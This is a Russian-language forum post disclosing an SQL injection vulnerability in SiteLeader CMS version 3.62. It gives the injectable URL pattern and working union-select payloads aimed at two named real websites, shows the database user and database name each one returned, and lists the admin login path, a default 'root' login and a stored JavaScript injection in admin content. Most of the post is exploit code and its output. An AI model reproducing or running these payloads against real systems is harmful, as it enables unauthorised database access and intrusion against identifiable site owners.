03.03.2014, 00:04
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
Провел на форуме:
178623
Репутация:
94
|
|
SiteLeader CMS
Цена: Стоимость услуг по разработке сайтов: 75 000 — 250 000
Сайт: www.siteleader.ru
Тестировалось на версии 3.62
SQL Injection
Код:
/news/[VALIDNUMBER][SQLINJ]
Пример реализации
Код:
http://www.juliavolkova.com/ru/news/1'
Код:
http://www.juliavolkova.com/ru/news/-1' union all select 1,2,concat(user(),0x3a,database()),4,5-- a
Ответ: VOLKOVA@LOCALHOST:VOLKOVA
Код:
http://krasimvse.ru/news/1'
Код:
http://krasimvse.ru/news/-1' union all select 1,2,concat(user(),0x3a,database()),4,5-- a
Ответ: kraskoteka@localhost:kraskoteka
Админ-панель: /admin/login/
Стандартный логин: root
При добавлении контента (в админ-панели) везде выполняется JS код.
Найдено мной
|
|
|